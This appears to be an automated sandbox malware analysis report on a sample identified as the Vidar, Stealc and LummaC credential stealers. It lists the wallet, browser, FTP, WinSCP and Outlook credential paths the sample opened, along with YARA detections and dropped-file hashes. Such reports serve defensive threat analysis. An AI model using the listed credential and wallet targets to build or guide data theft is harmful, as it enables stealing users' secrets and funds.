Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: RegAsm.exe, 00000003.00000002.2592313057.00000000004E4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004

Yara detected Credential Stealer

Source: Yara match	File source: 00000003.00000002.2592313057.0000000000503000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 424, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 15.2.DBGIJEHIID.exe.39c5570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.DBGIJEHIID.exe.39c5570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.3023059126.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2576073985.00000000039C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3026337297.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1916, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3ce5570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3ce5570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2113832701.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2592313057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 424, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C700C40 sqlite3_bind_zeroblob,		3_2_6C700C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C700D60 sqlite3_bind_parameter_name,		3_2_6C700D60

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1522636
Product:	CloudBasic
Start time:	13:58:06
Start date:	30.09.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	3c9241d0ce97c159d6cfaa49f602fafd
SHA1:	3a0320d338544496cb2ed6952d52e740c7f25d03
SHA256:	a73c4d134f180b9f4047f9be94f3f36b3a2e34469f8c90f70d964778efdc6adc
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\CFHIIEHJKKEC\IDHDGD	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6	933D6D14518371B212F36C3835794D75	92D056D912B3C0260D379330D3CC0359B57A322B	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
C:\ProgramData\CGCFCFBKFCFCBGDGIEGHJDAFHJ	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\DAKEBAKFHCFHIEBFBAFB	ASCII text, with very long lines (1717), with CRLF line terminators	0F58C61DE9618A1B53735181E43EE166	CC45931CF12AF92935A84C2A015786CC810AEC3A	AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
C:\ProgramData\DBGIJEHIID.exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	2832FBDE1CF7EA83BD6FD6A4A5E8FE15	1CED7A749D257091E0C3B75605FD3BC005E531DE	2B8BCD9D7D072FEB114E0436DC10AA80FDA52CDD46A4948EA1AE984F74898375
C:\ProgramData\EBFBKFBGIIIDGDGCFCGIIDAKFC	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7	CFFF4E2B77FC5A18AB6323AF9BF95339	3AA2C2115A8EB4516049600E8832E9BFFE0C2412	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
C:\ProgramData\EGDGCGCFHI.exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	38DABC7063C0A175A12C30BD44CF3DBC	6D7AABEBD8A417168E220C7497F4BC38C314DA3B	DE664956D799E59E1CCA0788D545922EE420E3AFDCF277442F148F52BC78DF89
C:\ProgramData\FIJKEHJJDAAK\AEBGHD	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	37B1FC046E4B29468721F797A2BB968D	50055EF1C50E4C1A7CCF7D00620E95128E4C448B	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
C:\ProgramData\FIJKEHJJDAAK\BGDAAE	ASCII text, with very long lines (1717), with CRLF line terminators	0F58C61DE9618A1B53735181E43EE166	CC45931CF12AF92935A84C2A015786CC810AEC3A	AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
C:\ProgramData\FIJKEHJJDAAK\CAKKEG	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1	7B955D976803304F2C0505431A0CF1CF	E29070081B18DA0EF9D98D4389091962E3D37216	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
C:\ProgramData\FIJKEHJJDAAK\CBAKEB	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\FIJKEHJJDAAK\EBGCBA	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8	271D5F995996735B01672CF227C81C17	7AEAACD66A59314D1CBF4016038D3A0A956BAF33	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
C:\ProgramData\FIJKEHJJDAAK\FIIIIJ	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7	CFFF4E2B77FC5A18AB6323AF9BF95339	3AA2C2115A8EB4516049600E8832E9BFFE0C2412	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
C:\ProgramData\FIJKEHJJDAAK\GDGDHJ	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\FIJKEHJJDAAK\GDGDHJ-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\FIJKEHJJDAAK\HIIEGH	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1	52701A76A821CDDBC23FB25C3FCA4968	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
C:\ProgramData\FIJKEHJJDAAK\IEHDBG	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	76D181A334D47872CD2E37135CC83F95	B563370B023073CE6E0F63671AA4AF169ABBF4E1	52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
